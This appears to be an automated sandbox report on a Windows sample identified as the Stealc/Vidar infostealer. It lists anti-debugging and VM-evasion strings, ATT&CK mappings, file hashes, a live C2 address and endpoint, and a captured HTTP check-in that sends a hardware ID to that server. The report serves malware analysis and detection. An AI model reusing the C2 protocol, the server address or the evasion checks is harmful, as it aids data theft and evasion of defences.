Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C04910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C04570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFF68A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C03EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF1160 GetSystemInfo,ExitProcess
Source: file.exe, 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2112766908.0000000000741000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2112766908.0000000000712000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware(
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13763
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13766
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13778
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13785
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13818
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF45C0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C09860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C09750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C078E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 5464, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C09600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe | Binary or memory string: oProgram Manager
Source: file.exe, 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: oProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C07B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C07980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C07850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C07A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2072045799.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5464, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2072045799.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5464, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (numbers give the count of matched signatures for the technique that follows them)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
http://185.215.113.37/ws | 100% | URL Reputation | malware
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.phpB | file.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php6 | file.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/I | file.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.2112766908.000000000072F000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpiH | file.exe, 00000000.00000002.2112766908.0000000000741000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1541926
Start date and time: 2024-10-25 10:26:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 91
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
                        No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
 | file.exe | malicious | Stealc | 185.215.113.37
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37
 | file.exe | malicious | Stealc | 185.215.113.37
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37
 | file.exe | malicious | Stealc | 185.215.113.37
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37
 | file.exe | malicious | Stealc, Vidar | 185.215.113.37
 | file.exe | malicious | Stealc | 185.215.113.37
No context
                        No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.94644211804884
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'795'584 bytes
MD5: c1dcd48eb2e8b81dfac6e6c4b33a4cee
SHA1: 1f3d8bf70d7cda5a72b8f6c7ddbff264e5a2bbf0
SHA256: 0135c24488681db4642d0052513db7a8a11658c8ee26ec1f31947f3bf0d897cf
SHA512: b4ce703029bcad01c76bea65df3059556c8b5ac0a2ec9e51ef8f89ddce5480363a04d62a89b714a04433db6486fcae22d804558f7c64474089a1dc210c3bcace
SSDEEP: 24576:Qhv87VldnWvuRbgBQHtYlwGqSvDDFNxaiKJ8PUFn+SlUQIWnzref:3ldnWPktY8SL5NxgJ8PMtlSqif
TLSH: 57853367697E4E11CB48F6B0C57F27132C286B12694E9E1E4216FA363337B2560C6DCD
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 00928e8e8686b000
Entrypoint: 0xa7c000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                        Instruction
                        jmp 00007F6C156086AAh
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                         | 0x1000 | 0x25b000 | 0x22800 | 5dde76c1d6e6e8d73b4ec71aadc3c05c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                         | 0x25e000 | 0x28c000 | 0x200 | 1e34a1cba19de0940f9f76bdee432b36 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        xyustrqz | 0x4ea000 | 0x191000 | 0x190200 | 15f75dc636308d1ac1da166f9231294e | False | 0.9945280771633864 | data | 7.9524401943159875 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        fcgrwzmi | 0x67b000 | 0x1000 | 0x600 | 1a1994f520becd0a5cc029a604d08011 | False | 0.6048177083333334 | data | 5.170289190478538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant | 0x67c000 | 0x3000 | 0x2200 | f08fa920b758f81f4a7d8fa8699404e9 | False | 0.060546875 | DOS executable (COM) | 0.7386290318181228 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        DLL | Import
                        kernel32.dll | lstrcpy
                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                        2024-10-25T10:27:03.731223+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Oct 25, 2024 10:27:02.514128923 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                        Oct 25, 2024 10:27:02.519546986 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                        Oct 25, 2024 10:27:02.519628048 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                        Oct 25, 2024 10:27:02.519798994 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                        Oct 25, 2024 10:27:02.525171995 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                        Oct 25, 2024 10:27:03.438963890 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                        Oct 25, 2024 10:27:03.439150095 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                        Oct 25, 2024 10:27:03.443002939 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                        Oct 25, 2024 10:27:03.448527098 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                        Oct 25, 2024 10:27:03.731108904 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                        Oct 25, 2024 10:27:03.731223106 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                        Oct 25, 2024 10:27:06.308478117 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                        • 185.215.113.37
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | 5464 | C:\Users\user\Desktop\file.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 25, 2024 10:27:02.519798994 CEST | 89 | OUT | GET / HTTP/1.1
                        Host: 185.215.113.37
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Oct 25, 2024 10:27:03.438963890 CEST | 203 | IN | HTTP/1.1 200 OK
                        Date: Fri, 25 Oct 2024 08:27:03 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Oct 25, 2024 10:27:03.443002939 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJD
                        Host: 185.215.113.37
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 33 39 36 34 45 42 38 31 34 39 37 33 33 37 30 38 35 37 36 34 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 2d 2d 0d 0a
                        Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="hwid"D3964EB814973370857647------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="build"doma------AKKECAFBFHJDGDHIEHJD--
                        Oct 25, 2024 10:27:03.731108904 CEST | 210 | IN | HTTP/1.1 200 OK
                        Date: Fri, 25 Oct 2024 08:27:03 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=



                        Target ID: 0
                        Start time: 04:26:58
                        Start date: 25/10/2024
                        Path: C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit): true
                        Commandline: "C:\Users\user\Desktop\file.exe"
                        Imagebase: 0xbf0000
                        File size: 1'795'584 bytes
                        MD5 hash: C1DCD48EB2E8B81DFAC6E6C4B33A4CEE
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2112766908.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2072045799.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        Reputation: low
                        Has exited: true


                          Execution Graph

                          Execution Coverage: 7.7%
                          Dynamic/Decrypted Code Coverage: 0%
                          Signature Coverage: 10.1%
                          Total number of Nodes: 2000
                          Total number of Limit Nodes: 24
14623->14624 14625 bf45c0 2 API calls 14624->14625 14626 bf420c 14625->14626 14627 bf45c0 2 API calls 14626->14627 14628 bf4225 14627->14628 14629 bf45c0 2 API calls 14628->14629 14630 bf423e 14629->14630 14631 bf45c0 2 API calls 14630->14631 14632 bf4257 14631->14632 14633 bf45c0 2 API calls 14632->14633 14634 bf4270 14633->14634 14635 bf45c0 2 API calls 14634->14635 14636 bf4289 14635->14636 14637 bf45c0 2 API calls 14636->14637 14638 bf42a2 14637->14638 14639 bf45c0 2 API calls 14638->14639 14640 bf42bb 14639->14640 14641 bf45c0 2 API calls 14640->14641 14642 bf42d4 14641->14642 14643 bf45c0 2 API calls 14642->14643 14644 bf42ed 14643->14644 14645 bf45c0 2 API calls 14644->14645 14646 bf4306 14645->14646 14647 bf45c0 2 API calls 14646->14647 14648 bf431f 14647->14648 14649 bf45c0 2 API calls 14648->14649 14650 bf4338 14649->14650 14651 bf45c0 2 API calls 14650->14651 14652 bf4351 14651->14652 14653 bf45c0 2 API calls 14652->14653 14654 bf436a 14653->14654 14655 bf45c0 2 API calls 14654->14655 14656 bf4383 14655->14656 14657 bf45c0 2 API calls 14656->14657 14658 bf439c 14657->14658 14659 bf45c0 2 API calls 14658->14659 14660 bf43b5 14659->14660 14661 bf45c0 2 API calls 14660->14661 14662 bf43ce 14661->14662 14663 bf45c0 2 API calls 14662->14663 14664 bf43e7 14663->14664 14665 bf45c0 2 API calls 14664->14665 14666 bf4400 14665->14666 14667 bf45c0 2 API calls 14666->14667 14668 bf4419 14667->14668 14669 bf45c0 2 API calls 14668->14669 14670 bf4432 14669->14670 14671 bf45c0 2 API calls 14670->14671 14672 bf444b 14671->14672 14673 bf45c0 2 API calls 14672->14673 14674 bf4464 14673->14674 14675 bf45c0 2 API calls 14674->14675 14676 bf447d 14675->14676 14677 bf45c0 2 API calls 14676->14677 14678 bf4496 14677->14678 14679 bf45c0 2 API calls 14678->14679 14680 bf44af 14679->14680 14681 bf45c0 2 API calls 14680->14681 14682 bf44c8 14681->14682 14683 bf45c0 2 API calls 14682->14683 14684 bf44e1 14683->14684 14685 bf45c0 2 API calls 14684->14685 14686 bf44fa 14685->14686 
